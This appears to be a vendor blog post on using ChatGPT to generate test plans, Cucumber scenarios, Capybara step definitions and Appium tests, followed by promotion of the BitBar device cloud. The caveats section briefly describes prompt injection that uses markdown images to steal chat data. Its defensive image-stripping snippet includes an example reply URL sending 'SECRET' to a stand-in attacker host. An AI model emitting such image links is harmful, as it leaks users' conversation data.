How to Use ChatGPT in Your Automated Tests

  May 12, 2023

OpenAI's ChatGPT has been widely reported as the fastest-growing consumer app to date, and if you've tried it, that probably doesn't come as a surprise!

ChatGPT has become popular for everything from creative tasks like writing a poem to technical tasks like writing code. Meanwhile, the business world is quickly discovering its ability to summarize complex data sets or perform complicated analyses. But, of course, these use cases are just scratching the surface of what may be possible long term. 

Many developers are already using ChatGPT and related technologies (like GitHub Copilot) to generate code. These tools are not only for those with advanced scripting knowledge: they are especially beneficial for junior developers and those new to automated tests.

In this article, you'll learn how ChatGPT works under the hood, how developers leverage this breakthrough technology, and how it can help automate tedious testing workflows. 

What is ChatGPT? 

Large language models (LLMs) are among the most significant artificial intelligence breakthroughs to come out of deep learning. These models learn to recognize language patterns by training on vast datasets. As a result, they can predict responses that are grammatically correct and meaningful to humans.

[Figure: How ChatGPT works on a lower level. Source: OpenAI]

The same concepts LLMs use to learn words and grammar structures apply to code and application architecture. In other words, ChatGPT and other LLMs can predict how code should look using the same techniques they use to predict how sentences should look. As a result, these tools have become tremendously popular among developers.
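To make the "predict what comes next" idea concrete, here is a deliberately tiny sketch: a bigram counter that suggests the most likely next token after seeing a few code-like lines. It is an illustration under heavy simplification, not how ChatGPT is implemented; real LLMs use neural networks trained on vastly more data, and the names `train_bigrams` and `predict_next` are made up for this example.

```python
from collections import Counter, defaultdict


def train_bigrams(lines):
    """Count, for every token, which tokens follow it in the training lines."""
    follows = defaultdict(Counter)
    for line in lines:
        tokens = line.split()
        for current, nxt in zip(tokens, tokens[1:]):
            follows[current][nxt] += 1
    return follows


def predict_next(follows, token):
    """Return the most frequent follower of `token`, or None if it was never seen."""
    if token not in follows:
        return None
    return follows[token].most_common(1)[0][0]


# A toy "corpus" of code-like lines (illustrative only).
corpus = [
    "def test_addition ( self ) :",
    "def test_subtraction ( self ) :",
    "def setUp ( self ) :",
]
model = train_bigrams(corpus)
print(predict_next(model, "("))  # self
```

Even this toy model "knows" that `self` tends to follow an opening parenthesis in method definitions, which hints at why pattern prediction carries over from prose to code.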

Some common developer use cases include:

  • Writing or Refactoring Code – ChatGPT can write code based on a user's instructions. And unlike past bots, ChatGPT can handle complex requirements, like building a WordPress plugin.
  • Explaining Code or Concepts  – ChatGPT can help developers better understand how a piece of code works or the rationale behind writing a piece of code in a certain way.
  • Generating Tests & Documentation – ChatGPT can write test cases, test scripts, or documentation for a piece of code, helping developers automate tedious workflows.
  • Identifying Best Practices – ChatGPT can help developers think through different scenarios and adhere to best practices when considering different architectures or data models. 

These capabilities can help developers eliminate busy work and improve their productivity. At the same time, they can help junior developers answer low-level questions without pulling senior engineers away from their work, saving time and resources. And finally, they can help all engineers think through problems in new ways. 

Important Caveats 

Large language models (LLMs) have come a long way over the past few years, but they aren't perfect. Their knowledge of the world is fixed at a training cutoff date, so they may not reflect current documentation. They also lack the nuance to respond properly to every input.

For example, ChatGPT struggles with basic math and logic, doesn’t understand many jokes, and may fabricate information. In addition, researchers have found significant bias in LLMs, which could prove dangerous in some circumstances.

ChatGPT is also susceptible to prompt injection attacks, in which injected instructions use markdown images or other techniques to steal chat data. As a result, there are security-related concerns about ChatGPT and other LLMs that could prove a barrier to some professional use.
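As a rough illustration of the markdown-image risk, the sketch below removes image syntax from a model reply before it is rendered, so that no remote URL is fetched automatically. This is one possible precaution under simple assumptions, not a complete defense against prompt injection; the function name and the example URL are hypothetical.

```python
import re

# Matches Markdown image syntax: ![alt text](url)
MARKDOWN_IMAGE = re.compile(r"!\[[^\]]*\]\([^)]*\)")


def strip_markdown_images(text: str) -> str:
    """Replace Markdown images with a placeholder so no remote URL is requested."""
    return MARKDOWN_IMAGE.sub("[image removed]", text)


# Hypothetical reply in which an injected image URL carries chat data.
reply = "Here is your summary. ![status](https://attacker.example/log?q=SECRET)"
print(strip_markdown_images(reply))
# Here is your summary. [image removed]
```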

How to Use ChatGPT for Automation 

The code-writing capabilities of ChatGPT are well-documented, with countless examples of everything from simple plugins to entire websites built by the chatbot. But, while ChatGPT still requires hand-holding when writing code, it's exceptional at building test cases, writing test scripts, and helping developers embrace testing best practices. 

Creating Test Cases 

Suppose that you're responsible for creating a test plan. With a simple prompt and a few bullet points, ChatGPT can create an in-depth test plan consisting of setup instructions and multiple test cases. You can even instruct ChatGPT to prepare a test case table to enter into Jira tickets, which results in a copy-and-pastable table!
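If you write such prompts often, a small helper can keep them consistent. The following is a minimal sketch that assembles a test-plan prompt from a feature name and a few bullet points; the function name, wording, and sample requirements are assumptions for illustration, and you would paste the resulting text into ChatGPT yourself.

```python
def build_test_plan_prompt(feature, requirements, as_table=False):
    """Assemble a test-plan prompt from a feature name and bullet points."""
    bullets = "\n".join(f"- {item}" for item in requirements)
    prompt = (
        f"Create a test plan for the following feature: {feature}.\n"
        "Include setup instructions and multiple test cases.\n"
        f"Requirements:\n{bullets}"
    )
    if as_table:
        # Optional instruction for output that can be pasted into a ticket.
        prompt += "\nFormat the test cases as a table I can paste into a Jira ticket."
    return prompt


print(build_test_plan_prompt(
    "Password reset",
    ["User receives a reset email", "Reset link expires after 24 hours"],
    as_table=True,
))
```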

Writing Test Scripts 

Suppose you want to write a unit test for existing code. By pasting the code snippet into ChatGPT, you can ask for a unit test, and it will create one based on the context it infers. You can then add these tests to your test automation process (e.g., your CI/CD pipeline) to help catch future regressions.
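The sketch below shows the kind of result you might aim for. Both the function under test (`apply_discount`) and the test class are hypothetical examples written for this article, not actual ChatGPT output; they simply illustrate a small function paired with tests for a typical case, a boundary case, and an error case.

```python
import unittest


def apply_discount(price, percent):
    """Hypothetical function under test: reduce `price` by `percent`."""
    if not 0 <= percent <= 100:
        raise ValueError("percent must be between 0 and 100")
    return round(price * (1 - percent / 100), 2)


class ApplyDiscountTest(unittest.TestCase):
    def test_typical_discount(self):
        self.assertEqual(apply_discount(200.0, 25), 150.0)

    def test_zero_discount_returns_original_price(self):
        self.assertEqual(apply_discount(80.0, 0), 80.0)

    def test_invalid_percent_raises(self):
        with self.assertRaises(ValueError):
            apply_discount(80.0, 120)
```

Saved in a test file, these can be run locally or in a pipeline with `python -m unittest`.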

Explaining Test Results 

If you run the test script generated in the previous section and receive an error, you can copy and paste it into ChatGPT, and it will create an explanation. Additionally, the conversational format of ChatGPT means you can also ask follow-up questions. These same capabilities can help developers fix bugs. 

Creating Test Summaries 

Suppose you have a list of test results and want to summarize the results for a team lead or stakeholder. You can ask ChatGPT to summarize the results in a narrative format for a particular audience (e.g., technical or non-technical). Or, you can request that ChatGPT put the results into a table that may form part of a more extensive report. 
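A short script can turn raw results into a prompt for either audience. This is a sketch under simple assumptions: results arrive as (test name, status) pairs, and the function name, statuses, and wording are hypothetical.

```python
from collections import Counter


def build_summary_prompt(results, audience="non-technical"):
    """Build a prompt asking for a narrative summary of (name, status) results."""
    totals = Counter(status for _, status in results)
    counts = ", ".join(f"{totals[status]} {status}" for status in sorted(totals))
    rows = "\n".join(f"- {name}: {status}" for name, status in results)
    return (
        f"Summarize these test results for a {audience} audience "
        f"in a short narrative ({counts}).\n{rows}"
    )


# Hypothetical results from a test run.
results = [("login", "passed"), ("checkout", "failed"), ("search", "passed")]
print(build_summary_prompt(results, audience="technical"))
```

Including the totals in the prompt gives you a quick way to check the generated summary against the real numbers.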

Examples in Action 

Let's start by generating a BDD scenario using Cucumber and its domain-specific language (DSL), Gherkin. These specifications are both machine- and human-readable, which improves communication between testers, developers, and non-technical business people.

We can start with the prompt: "Generate a test case using Cucumber for Google Search." 

Note: You could replace "Google Search" with a description of your feature or functionality. 

    Feature: Google Search Engine

      Scenario: User performs a successful search
        As a user who wants to find information quickly
        I want to search using Google's search engine
        So that I can find relevant results easily

        Given I am on the Google homepage
        When I enter a "cucumber testing" query into the search bar
        And I click the "Search" button
        Then I should see search results related to "cucumber testing"
        And the first result should have a title containing "Cucumber"
        And the first result should have a URL containing ""

Next, we can generate specific test steps using the prompt: "Implement these steps using Cucumber's step definitions." 

Note: These step definitions are written in Ruby using the Capybara library, but you can specify any language or framework you want. 

    require 'capybara/cucumber'

    Given("I am on the Google homepage") do
      # Assumption: the homepage URL is not shown here, so Google's public address is used.
      visit "https://www.google.com"
    end

    When("I enter a {string} query into the search bar") do |search_term|
      fill_in("q", with: search_term)
    end

    When("I click the {string} button") do |button_name|
      # Assumption: the button is located by its visible label.
      click_button(button_name)
    end

    Then("I should see search results related to {string}") do |search_term|
      expect(page).to have_content(search_term)
    end

    # The CSS classes below come from Google's generated markup and may change without notice.
    Then("the first result should have a title containing {string}") do |title_substring|
      first_result_title = find(".g:first-child .LC20lb.DKV0Md").text
      expect(first_result_title).to include(title_substring)
    end

    Then("the first result should have a URL containing {string}") do |url_substring|
      first_result_url = find(".g:first-child .yuRUbf a")[:href]
      expect(first_result_url).to include(url_substring)
    end

And voila, you have an executable BDD specification that you can use to ensure an application performs as expected.

You can also use ChatGPT to create automated UI tests. For example, to test a mobile calculator app's addition and subtraction functions using Appium, use the prompt: "Write an Appium test for a mobile calculator app with an addition and subtraction button."

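    import unittest

    from appium import webdriver
    from appium.options.android import UiAutomator2Options
    from appium.webdriver.common.appiumby import AppiumBy  # replaces the deprecated MobileBy


    class CalculatorAppTest(unittest.TestCase):

        def setUp(self):
            capabilities = {
                "platformName": "Android",
                "deviceName": "Android Emulator",
                "app": "/path/to/your/calculator.apk",
                "automationName": "UiAutomator2",
            }
            # Recent Appium clients take an options object instead of desired_capabilities.
            options = UiAutomator2Options().load_capabilities(capabilities)
            # Supply your Appium server URL as the first argument.
            self.driver = webdriver.Remote("", options=options)

        def tearDown(self):
            # End the session so the device is released after each test.
            self.driver.quit()

        def test_addition(self):
            number1 = self.driver.find_element(AppiumBy.ACCESSIBILITY_ID, "number1")
            number2 = self.driver.find_element(AppiumBy.ACCESSIBILITY_ID, "number2")
            # Assumed inputs: any pair that sums to the asserted "8".
            number1.send_keys("5")
            number2.send_keys("3")
            add_button = self.driver.find_element(AppiumBy.ACCESSIBILITY_ID, "addButton")
            add_button.click()
            result = self.driver.find_element(AppiumBy.ACCESSIBILITY_ID, "result")
            self.assertEqual(result.text, "8")

        def test_subtraction(self):
            number1 = self.driver.find_element(AppiumBy.ACCESSIBILITY_ID, "number1")
            number2 = self.driver.find_element(AppiumBy.ACCESSIBILITY_ID, "number2")
            # Assumed inputs: any pair whose difference is the asserted "3".
            number1.send_keys("5")
            number2.send_keys("2")
            subtract_button = self.driver.find_element(AppiumBy.ACCESSIBILITY_ID, "subtractButton")
            subtract_button.click()
            result = self.driver.find_element(AppiumBy.ACCESSIBILITY_ID, "result")
            self.assertEqual(result.text, "3")


    if __name__ == "__main__":
        unittest.main()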

These tests are a solid starting point and need only light editing before they run: you still have to supply environment details, such as the app path and server URL, and confirm that the element locators match your application. While you may need to engineer prompts to get the best results or modify the output to suit your project better, ChatGPT can often get your tests most of the way there. As a result, senior engineers can save time, and junior engineers can get up to speed faster.

Scaling Tests Across Devices 

Creating test cases and scripts with the help of ChatGPT can dramatically improve test coverage. But these tests don’t guarantee functionality across devices, operating systems, and browsers. A robust test suite requires testing across multiple devices and platforms that reflect your users’ real-life patterns. 
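One way to reason about cross-device coverage is to enumerate the combinations explicitly. The sketch below builds a simple platform/browser matrix; the platform names, browsers, and the excluded pair are hypothetical placeholders that you would replace with the mix your users actually run.

```python
from itertools import product

# Hypothetical coverage targets; replace with your own usage data.
PLATFORMS = ["Android 13", "iOS 16"]
BROWSERS = ["Chrome", "Safari"]
# Pairs to skip because the browser is not available on that platform.
UNSUPPORTED = {("Android 13", "Safari")}


def build_matrix(platforms, browsers, unsupported=frozenset()):
    """Return every valid platform/browser pair as a config dictionary."""
    return [
        {"platform": platform, "browser": browser}
        for platform, browser in product(platforms, browsers)
        if (platform, browser) not in unsupported
    ]


for config in build_matrix(PLATFORMS, BROWSERS, UNSUPPORTED):
    print(config)
```

Each dictionary can then feed the setup step of a test, so the same script runs once per configuration.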

BitBar provides an easy-to-use cloud-based platform for end-to-end tests. Rather than maintaining an in-house device lab, you can leverage hundreds of real devices in the cloud and run tests across operating systems and browsers. That way, you can confidently deploy code, knowing it will work across all environments. 

[Figure: BitBar’s device cloud provides access to thousands of configurations to make your tests as accurate as possible. Source: SmartBear]

The platform makes it easy to incorporate browser-based and mobile testing within your existing CI/CD pipeline. BitBar supports popular frameworks like Selenium, Appium, and Cypress. You can also use parallel testing to speed up your test suite without sacrificing test quality or coverage. Manual testers can provision cloud-based devices for exploratory and other manual testing tasks. 
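To show why parallel execution shortens a test run, here is a generic sketch using Python's standard `concurrent.futures` module. It is not BitBar's API: `run_suite` is a hypothetical placeholder that stands in for starting a remote session and running your tests on one device configuration, and the device names are examples only.

```python
from concurrent.futures import ThreadPoolExecutor


def run_suite(config):
    """Placeholder for a real test run; returns (config name, passed)."""
    # A real implementation would start a remote session for `config` here.
    return config, True


def run_in_parallel(configs, max_workers=4):
    """Run the suite for every config concurrently and collect the results."""
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        return dict(pool.map(run_suite, configs))


results = run_in_parallel(["Pixel 7 / Chrome", "iPhone 14 / Safari", "Galaxy S23 / Chrome"])
print(results)
```

Threads suit this kind of work because each run mostly waits on a remote device, so the total time approaches that of the slowest configuration rather than the sum of all of them.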

The Bottom Line 

ChatGPT and other LLMs can significantly improve developer productivity, opening the door to new possibilities. In particular, they can help automate the creation of test cases and scripts, making it possible to expand test coverage and quality. And with GitHub Copilot and other tools in active development, these capabilities will only grow in the future.
